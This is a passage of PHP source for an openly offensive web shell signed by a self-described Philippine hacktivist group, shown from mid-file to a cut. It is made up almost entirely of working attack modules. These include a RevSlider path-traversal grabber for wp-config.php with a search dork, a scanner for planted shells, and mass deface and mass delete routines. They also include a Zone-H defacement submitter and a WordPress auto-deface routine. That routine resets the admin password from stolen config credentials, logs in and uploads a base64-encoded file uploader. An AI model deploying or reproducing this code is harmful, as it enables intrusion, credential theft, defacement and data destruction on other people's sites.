1004. if($domain_jump == '') {
1005. echo " => ( <font color=red>ERROR ~Xlegion</font> )<br>";
1006. } else {
1007. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1008. foreach($domains_jump[1] as $dj) {
1009. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1010. $user_jumping_url = $user_jumping_url['name'];
1011. if($user_jumping_url == $user_idx_jump) {
1012. echo " <a href=\"".$dj."\">$dj</a> <br>";
1013. break;
1014. }
1015. }
1016. }
1017. } else {
1018. echo "<br>";
1019.  
1020. }
1021. }
1022. }
1023. }
1024. }
1025. if($i == 0) {
1026. } else {
1027. echo "<br>Total @ ".$i." = ".$ip;}
1028. echo "</pre>";}
1029. echo "</div>";
1030. }
1031.  
1032. //END JUMPING //
1033.  
1034.  
1035.  
1036. // ABOUT //
1037.  
1038.  
1039. elseif($_GET['about'] == 'ph'){
1040. echo "
1041. <center>
1042. <br>
1043.  
1044. <font size='7px' color='grey'> Magician | Hacktivist | Philippines </font> <br>
1045. <font size='4px' color='grey'>'Laughting at your Security Since 2016'</font> <br>
1046. </center>
1047. <pre align=center>
1048.  
1049. DOZ | ALAS | CYBERMOON | NET7 | PSEUDO-X | PARALLAX | TOKHANG | M0RPH1US
1050.  
1051.  
1052. >RESPECT<
1053. <marquee width=50%>
1054.  
1055. ANONYMOUS PHILIPPINES - ANONYWOLVES PH - GENERATION X SECURITY TEAM -GAY SEC INTERNATIONAL - ANONGHOST - XAI SYNDICATE - CLAY PH - CYBER SECURITY INTERNATIONAL - PHILIPPINE CYBER WARIORS
1056. </marquee>
1057.  
1058.  
1059.  
1060. </body>
1061. </html>
1062.  
1063.  
1064.  
1065. ";
1066. footer();
1067. }
1068.  
1069. // END ABOUT //
1070.  
1071.  
1072. // DATA BASE DUMP //
1073.  
1074. elseif ($_GET['do'] == 'dbdump') {
1075. echo $head . '<center><h1 class="title">DATABASE DUMP</h1><br><p align="center">';
1076. echo '<form action method=post>
1077. <table width=371 class=tabnet >
1078. <tr>
1079. <td>Server </td>
1080. <td><input class="input" type=text name=server size=52></td></tr><tr>
1081. <td>Username</td>
1082. <td><input class="input" type=text name=username size=52></td></tr><tr>
1083. <td>Password</td>
1084. <td><input class="input" type=text name=password size=52></td></tr><tr>
1085. <td>DataBase Name</td>
1086. <td><input class="input" type=text name=dbname size=52></td></tr>
1087. <tr>
1088. <td>DB Type </td>
1089. <td><form method=post action="' . $me . '">
1090. <select class="inputz" name=method>
1091. <option value="gzip">Gzip</option>
1092. <option value="sql">Sql</option>
1093. </select>
1094. <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
1095. </form></center></table>';
1096. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']) {
1097. $date = date("Y-m-d");
1098. $dbserver = $_POST['server'];
1099. $dbuser = $_POST['username'];
1100. $dbpass = $_POST['password'];
1101. $dbname = $_POST['dbname'];
1102. $file = "Dump-$dbname-$date";
1103. $method = $_POST['method'];
1104. if ($method == 'sql') {
1105. $file = "Dump-$dbname-$date.sql";
1106. $fp = fopen($file, "w");
1107. } else {
1108. $file = "Dump-$dbname-$date.sql.gz";
1109. $fp = gzopen($file, "w");
1110. }
1111. function write($data) {
1112. global $fp;
1113. if ($_POST['method'] == 'ssql') {
1114. fwrite($fp, $data);
1115. } else {
1116. gzwrite($fp, $data);
1117. }
1118. }
1119. mysql_connect($dbserver, $dbuser, $dbpass);
1120. mysql_select_db($dbname);
1121. $tables = mysql_query("SHOW TABLES");
1122. while ($i = mysql_fetch_array($tables)) {
1123. $i = $i['Tables_in_' . $dbname];
1124. $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
1125. write($create['Create Table'] . ";nn");
1126. $sql = mysql_query("SELECT * FROM " . $i);
1127. if (mysql_num_rows($sql)) {
1128. while ($row = mysql_fetch_row($sql)) {
1129. foreach ($row as $j => $k) {
1130. $row[$j] = "'" . mysql_escape_string($k) . "'";
1131. }
1132. write("INSERT INTO $i VALUES(" . implode(",", $row) . ");n");
1133. }
1134. }
1135. }
1136. if ($method == 'ssql') {
1137. fclose($fp);
1138. } else {
1139. gzclose($fp);
1140. }
1141. header("Content-Disposition: attachment; filename=" . $file);
1142. header("Content-Type: application/download");
1143. header("Content-Length: " . filesize($file));
1144. flush();
1145. $fp = fopen($file, "r");
1146. while (!feof($fp)) {
1147. echo fread($fp, 65536);
1148. flush();
1149. }
1150. fclose($fp);
1151.  
1152. footer();}
1153. }
1154. // END DATABASE DUMP //
1155.  
1156.  
1157. // CONFIG GRABBER //
1158.  
1159.  
1160. elseif($_GET['do'] == 'revs'){
1161. echo '<center><h1 class="title ">MHPH WP CONFIG GRABBER</h1><br>
1162. <p1>Be Mindfull that to submit a Valid URL with <font color="red">http://</font> and <font color="red">/</font>!<br><i>eg: http://website.com/ </i><br><b>DORK: <a href="https://www.google.com/#q=revslider.php+%22Index+of%22">revslider.php "Index Of"</a></b></p1><br>
1163. <form method="POST">
1164. <input type="text" name="link" placeholder="https://wordpress.com/" required><input type="submit" value="Get Config"/>
1165. </form>';
1166.  
1167. if(isset($_POST['link']) && (!empty($_POST['link']))){
1168. $li = $_POST['link'];
1169. echo "<font color='blue'>Sanitizing String . . . . </font></br>";
1170. sleep(2);
1171. $lin = htmlspecialchars($li);
1172. $link = filter_var($lin, FILTER_SANITIZE_STRING);
1173. echo "<font color='green'>Sanitazion Success</font></br>";
1174. echo "<font color='blue'>Validating URL . . . .</font></br>";
1175. sleep(3);
1176.  
1177. if (!preg_match("/\b(?:(?:https?|ftp|http?):\/\/|www\.)[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i",$link)) {
1178. echo "<font color='red'>String is not a URL!!</font>, ~ Try Again Later!</br>";
1179. echo "String: ".$link;
1180. exit();
1181. }else{
1182. echo "<font color='green'>URL Validated Successfully. . . .</font><br/>";
1183. echo "<font color='blue'>Downloading WP-Config!. . . .</font><br/>";
1184. sleep(2);
1185. //It will downloaded directly if its Vuln for Revslider Exploit
1186. $wpconfig = $link."wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
1187. echo "<a href='".$wpconfig."' target='_BLANK' >Download WP-Config</a>";
1188. echo "<script>window.open('".$wpconfig."')</script></center>";
1189.  
1190. footer();}
1191. }
1192. }
1193.  
1194.  
1195. // END WP CONFIG GRABBER //
1196.  
1197.  
1198. // SHELL FINDER //
1199.  
1200. elseif($_GET['do'] == 'shellfind') {
1201. echo'<center><h1 class="titulo">Shell Finder</h1>
1202. <form action="" method="post">
1203. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
1204. <br>
1205. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
1206. </form><br>';
1207. if (isset($_POST["scan"])) {
1208. $url = $_POST['traget'];
1209. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
1210. echo "Result :<br />";
1211. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
1212. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
1213. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
1214. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
1215. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
1216. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
1217. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
1218. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
1219. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
1220. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
1221. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
1222. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
1223. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
1224. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
1225. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
1226. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
1227. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
1228. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
1229. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
1230. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
1231. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
1232. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
1233. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
1234. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
1235. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
1236. foreach ($shells as $shell){
1237. $headers = get_headers("$url$shell"); //
1238. if (eregi('200', $headers[0])) {
1239. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
1240. $dz = fopen('shells.txt', 'a+');
1241. $suck = "$url$shell";
1242. fwrite($dz, $suck."\n");
1243. }
1244. }
1245. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
1246.  
1247. footer();}
1248. }
1249.  
1250. // END SHELL FINDER //
1251.  
1252.  
1253.  
1254.  
1255.  
1256.  
1257.  
1258.  
1259.  
1260. //MASS DEFACE //
1261.  
1262.  
1263.  
1264. elseif($_GET['do'] == 'mass') {
1265. function M0rph1us($dir,$nfilez,$scriptM0rph1us) {
1266. if(is_writable($dir)) {
1267. $dira = scandir($dir);
1268. foreach($dira as $dirb) {
1269. $dirc = "$dir/$dirb";
1270. $local = $dirc.'/'.$nfilez;
1271. if($dirb === '.') {
1272. file_put_contents($local, $scriptM0rph1us);
1273. } elseif($dirb === '..') {
1274. file_put_contents($local, $scriptM0rph1us);
1275. } else {
1276. if(is_dir($dirc)) {
1277. if(is_writable($dirc)) {
1278. echo "DONE $local<br>";
1279. file_put_contents($local, $scriptM0rph1us);
1280. $idx = M0rph1us($dirc,$nfilez,$scriptM0rph1us);
1281. }
1282. }
1283. }
1284. }
1285. }
1286. }
1287. function xlegionport($dir,$nfilez,$scriptxlegion) {
1288. if(is_writable($dir)) {
1289. $dira = scandir($dir);
1290. foreach($dira as $dirb) {
1291. $dirc = "$dir/$dirb";
1292. $local = $dirc.'/'.$nfilez;
1293. if($dirb === '.') {
1294. file_put_contents($local, $scriptxlegion);
1295. } elseif($dirb === '..') {
1296. file_put_contents($local, $scriptxlegion);
1297. } else {
1298. if(is_dir($dirc)) {
1299. if(is_writable($dirc)) {
1300. echo "<a href=$dirb/$nfilez>/$dirb/$nfilez<br>";
1301. file_put_contents($local, $scriptxlegion);
1302. }
1303. }
1304. }
1305. }
1306. }
1307. }
1308. if($_POST['start']) {
1309. if($_POST['varxr'] == 'varxr') {
1310. echo "<div style='margin: 5px auto; padding: 5px'>";
1311. xlegion($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1312. echo "</div>";
1313. } elseif($_POST['varxr'] == 'wanxlegion') {
1314. echo "<div style='margin: 5px auto; padding: 5px'>";
1315. xlegionport($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1316. echo "</div>";
1317.  
1318. }
1319. footer();} else {
1320. echo "<center><h3>Mass Deface Dir</h3>";
1321. echo "<form method='post'><fieldset style='width:47%;'><legend><h3>TYPE:</h3></legend>
1322. <input type='radio' name='varxr' value='wanM0rph1uS' checked>$dir [ ".w($dir,"Writeable")." ]<br><hr><input type='radio' name='varxr' value='varxr'>Home Root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ] <br><hr>
1323. <font style='text-decoration: none;'>Folder:</font><br>
1324. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1325. <font style='text-decoration: underline;'>Filename:</font><br>
1326. <input type='text' name='d_file' value='M0rph1uS.php' style='width: 450px;' height='10'></fieldset><br>
1327. <font style='text-decoration: underline;'>Codes / Text:</font><br>
1328. <textarea name='script' style='max-width: 450px; height: 200px;'>Hacked By Magician Hacktivist Philippines</textarea><br>
1329. <input type='submit' name='start' value='GO!' style='width: 450px;'>
1330. </form></center>";
1331. footer();}
1332. }
1333.  
1334.  
1335. //END MASS DEFACE //
1336.  
1337.  
1338.  
1339. //MASS DELETE //
1340.  
1341.  
1342. elseif($_GET['do'] == 'massd') {
1343. function xlegion($dir,$nfilez) {
1344. if(is_writable($dir)) {
1345. $dira = scandir($dir);
1346. foreach($dira as $dirb) {
1347. $dirc = "$dir/$dirb";
1348. $locx = $dirc.'/'.$nfilez;
1349. if($dirb === '.') {
1350. if(file_exists("$dir/$nfilez")) {
1351. unlink("$dir/$nfilez");}
1352. } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$nfilez")) {
1353. unlink("".dirname($dir)."/$nfilez");
1354. }
1355. } else {
1356. if(is_dir($dirc)) {
1357. if(is_writable($dirc)) {
1358. if(file_exists($locx)) {
1359. echo "<b color=red>$locx</b><br>";
1360. unlink($locx);
1361. $idx = xlegion($dirc,$nfilez);
1362. }
1363. }
1364. }
1365. }
1366. }
1367. }
1368. }
1369. if($_POST['start']) {
1370. echo "<div style='margin: 5px auto; padding: 5px'>";
1371. xlegion($_POST['d_dir'], $_POST['d_file']);
1372. echo "</div>";
1373. } else {
1374. echo "<center><h3>Mass Delete Dir</h3>";
1375. echo "<form method='post' style='border:1px solid white; padding:1%; width:40%;'>
1376. <font style='text-decoration: underline;'>Folder:</font><br>
1377. <input type='text' name='d_dir' value='$dir' style='max-width: 450px;' height='10'><br>
1378. <font style='text-decoration: underline;'>Filename:</font><br>
1379. <input type='text' name='d_file' value='shell.php' style='max-width: 450px;' height='10'><br>
1380. <input type='submit' name='start' value='>>' style='max-width: 450px;'>
1381. </form></center>";
1382. footer();
1383. }
1384. }
1385.  
1386.  
1387. // END MASS DELETE //
1388.  
1389.  
1390.  
1391. // STRING TOOLS //
1392.  
1393. elseif($_GET['do'] == 'hash')
1394. {
1395. echo "
1396. <center>
1397. <br>
1398. <fieldset style='width:40%;'>
1399. <legend><h3>String Tools</h3></legend>
1400. <br>
1401. <form method=post>
1402. TEXT : <input type=text name=text placeholder=Please_Input.. >
1403. <br>
1404.  
1405. TYPE : <select name=opt>
1406. <option value='md5'>Md5</option>
1407. <option value='sha1'>sha1</option>
1408. <option value='base64_encode'>Base64 Encode</option>
1409. <option value='base64_decode'>Base64 Decode</option>
1410. <option>urlencode</option>
1411. <option>urldecode</option>
1412. <option>full_urlencode</option>
1413. <option>crc32</option>
1414. <option>ascii2hex</option>
1415. <option>hex2ascii</option>
1416. <option>hexdec</option>
1417. <option>hex2bin</option>
1418. <option>dechex</option>
1419. <option>binhex</option>
1420. <option>bindec</option>
1421. <option>strtolower</option>
1422. <option>strtoupper</option>
1423. <option>htmlspecialchars</option>
1424. <option>strlen</option>
1425. <option>md4</option>
1426. <option>str_word_count</option>
1427. <option>strrev</option>
1428. <option>ucwords</option>
1429. </select>
1430. <br>
1431. <input type=submit name=submit value=SUBMIT><br></form>
1432. ";
1433. $text = $_POST['text'];
1434. $val = htmlspecialchars($_POST['opt']);
1435. if(isset($_POST['submit'])){
1436. echo "<center>Result:</center><textarea style='border:1px solid white; width:80%; background-color:transparent; color:white; height:10%;' readonly>".$val($text)."</textarea></center><br>";
1437. }
1438. echo "</fieldset>";
1439. footer();
1440. }
1441. //END STRING TOOLS
1442.  
1443.  
1444.  
1445. // AUTO ZONE H POSTER //
1446.  
1447. elseif($_GET['do'] == 'zoneh') {
1448. if($_POST['submit']) {
1449. $domain = explode("\r\n", $_POST['url']);
1450. $nick = $_POST['nick'];
1451. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1452. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1453. function zoneh($url,$nick) {
1454. $ch = curl_init("http://www.zone-h.com/notify/single");
1455. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1456. curl_setopt($ch, CURLOPT_POST, true);
1457. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1458. return curl_exec($ch);
1459. curl_close($ch);
1460. }
1461. foreach($domain as $url) {
1462. $zoneh = zoneh($url,$nick);
1463. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
1464. echo "$url -> <font color=lime>OK</font><br>";
1465. } else {
1466. echo "$url -> <font color=red>ERROR</font><br>";
1467. }
1468. }
1469. } else {
1470. echo "<center><h1 class='titulo'>ZONE-H</h1></center><br>";
1471. echo "<center><form method='post'>
1472. <u>Defacer</u>: <br>
1473. <input type='text' name='nick' size='50' value='M0rph1us'><br>
1474. <u>Domains</u>: <br>
1475. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1476. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
1477. </form>";
1478.  
1479. footer(); }
1480. }
1481.  
1482.  
1483. // END ZONE H //
1484.  
1485.  
1486.  
1487.  
1488.  
1489. // FAKE ROOT //
1490.  
1491. elseif($_GET['do'] == 'fakeroot') {
1492. ob_start();
1493. function reverse($url) {
1494. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
1495. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1496. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
1497. curl_setopt($ch, CURLOPT_HEADER, 0);
1498. curl_setopt($ch, CURLOPT_POST, 1);
1499. $resp = curl_exec($ch);
1500. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
1501. $array = explode(",,", $resp);
1502. unset($array[0]);
1503. foreach($array as $lnk) {
1504. $lnk = "http://$lnk";
1505. $lnk = str_replace(",", "", $lnk);
1506. echo $lnk."\n";
1507. ob_flush();
1508. flush();
1509. }
1510. curl_close($ch);
1511. }
1512. function cek($url) {
1513. $ch = curl_init($url);
1514. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1515. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1516. $resp = curl_exec($ch);
1517. return $resp;
1518. }
1519. $cwd = getcwd();
1520. $ambil_user = explode("/", $cwd);
1521. $user = $ambil_user[2];
1522. if($_POST['reverse']) {
1523. $site = explode("\r\n", $_POST['url']);
1524. $file = $_POST['file'];
1525. foreach($site as $url) {
1526. $cek = cek("$url/~$user/$file");
1527. if(preg_match("/hacked/i", $cek)) {
1528. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
1529. }
1530. }
1531. } else {
1532. echo "<center><h1 class='titulo'>FAKE ROOTER</h1></center><br>";
1533. echo "<center><form method='post'>
1534. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
1535. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
1536. Domain: <br>
1537. <textarea style='width: 450px; height: 250px;' name='url'>";
1538. reverse($_SERVER['HTTP_HOST']);
1539. echo "</textarea><br>
1540. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
1541. </form><br>
1542. NB: Upload Your deface page in /home/user not in the /home/user/public_html (Common Sense Enters here).</center>";
1543.  
1544. footer();}
1545. }
1546. // END FAKEROOT //
1547.  
1548.  
1549.  
1550.  
1551.  
1552. // WP AUTO DEFACE //
1553.  
1554.  
1555.  
1556. elseif($_GET['do'] == 'auto_dwp') {
1557. if($_POST['auto_deface_wp']) {
1558. function anucurl($sites) {
1559. $ch = curl_init($sites);
1560. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1561. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1562. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1563. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1564. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1565. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1566. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1567. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1568. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1569. $data = curl_exec($ch);
1570. curl_close($ch);
1571. return $data;
1572. }
1573. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1574. $post = array(
1575. "log" => "$userr",
1576. "pwd" => "$pass",
1577. "rememberme" => "forever",
1578. "wp-submit" => "$wp_submit",
1579. "redirect_to" => "$web",
1580. "testcookie" => "1",
1581. );
1582. $ch = curl_init($cek);
1583. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1584. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1585. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1586. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1587. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1588. curl_setopt($ch, CURLOPT_POST, 1);
1589. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1590. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1591. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1592. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1593. $data = curl_exec($ch);
1594. curl_close($ch);
1595. return $data;
1596. }
1597. $scan = $_POST['link_config'];
1598. $link_config = scandir($scan);
1599. $script = htmlspecialchars($_POST['script']);
1600. $user = "M0rph1us";
1601. $pass = "M0rph1us";
1602. $passx = md5($pass);
1603. foreach($link_config as $dir_config) {
1604. if(!is_file("$scan/$dir_config")) continue;
1605. $config = file_get_contents("$scan/$dir_config");
1606. if(preg_match("/WordPress/", $config)) {
1607. $dbhost = ambilkata($config,"DB_HOST', '","'");
1608. $dbuser = ambilkata($config,"DB_USER', '","'");
1609. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1610. $dbname = ambilkata($config,"DB_NAME', '","'");
1611. $dbprefix = ambilkata($config,"table_prefix = '","'");
1612. $prefix = $dbprefix."users";
1613. $option = $dbprefix."options";
1614. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1615. $db = mysql_select_db($dbname);
1616. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1617. $result = mysql_fetch_array($q);
1618. $id = $result[ID];
1619. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1620. $result2 = mysql_fetch_array($q2);
1621. $target = $result2[option_value];
1622. if($target == '') {
1623. echo "[-] <font color=red>error, could not take his domain name</font><br>";
1624. } else {
1625. echo "[+] $target <br>";
1626. }
1627. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1628. if(!$conn OR !$db OR !$update) {
1629. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1630. mysql_close($conn);
1631. } else {
1632. $site = "$target/wp-login.php";
1633. $site2 = "$target/wp-admin/theme-install.php?upload";
1634. $b1 = anucurl($site2);
1635. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1636. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1637. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1638. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1639. $www = "m.php";
1640. $fp5 = fopen($www,"w");
1641. fputs($fp5,$upload3);
1642. $post2 = array(
1643. "_wpnonce" => "$anu2",
1644. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1645. "themezip" => "@$www",
1646. "install-theme-submit" => "Install Now",
1647. );
1648. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1649. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1650. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1651. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1652. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1653. curl_setopt($ch, CURLOPT_POST, 1);
1654. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1655. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1656. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1657. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1658. $data3 = curl_exec($ch);
1659. curl_close($ch);
1660. $y = date("Y");
1661. $m = date("m");
1662. $namafile = "id.php";
1663. $fpi = fopen($namafile,"w");
1664. fputs($fpi,$script);
1665. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1666. curl_setopt($ch6, CURLOPT_POST, true);
1667. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1668. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1669. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1670. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1671. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1672. $postResult = curl_exec($ch6);
1673. curl_close($ch6);
1674. $as = "$target/k.php";
1675. $bs = anucurl($as);
1676. if(preg_match("#$script#is", $bs)) {
1677. echo "[+] <font color='lime'>Manage...</font><br>";
1678. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1679. } else {
1680. echo "[-] <font color='red'>Error!...</font><br>";
1681. echo "[!!] Just Try Manual: <br>";
1682. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1683. echo "[+] username: <font color=lime>$user</font><br>";
1684. echo "[+] password: <font color=lime>$pass</font><br><br>";
1685. }
1686. mysql_close($conn);
1687. }
1688. }
1689. }
1690. } else {
1691. echo "<center><h1 class='titulo'>WordPress Auto Deface</h1>
1692. <form method='post'>
1693. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1694. <input type='text' name='script' height='10' size='50' placeholder='Hacked By M0rph1us' required><br>
1695. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Deface!!'>
1696. </form>
1697. <br><span>NB: These tools work if run in a folder <u>config</u> ( ex: /home/user/public_html/name_folder_config )</span>
1698. </center>";
1699.  
1700. footer(); }
1701.  
1702. }
1703.  
1704. // END WP AUTO DEFACE //
1705.  
1706.  
1707.  
1708.  
1709. // WP AUTO DEF 2 //
1710.  
1711. elseif($_GET['do'] == 'auto_dwp2') {
1712. if($_POST['auto_deface_wp']) {
1713. function anucurl($sites) {
1714. $ch = curl_init($sites);
1715. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1716. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1717. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1718. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
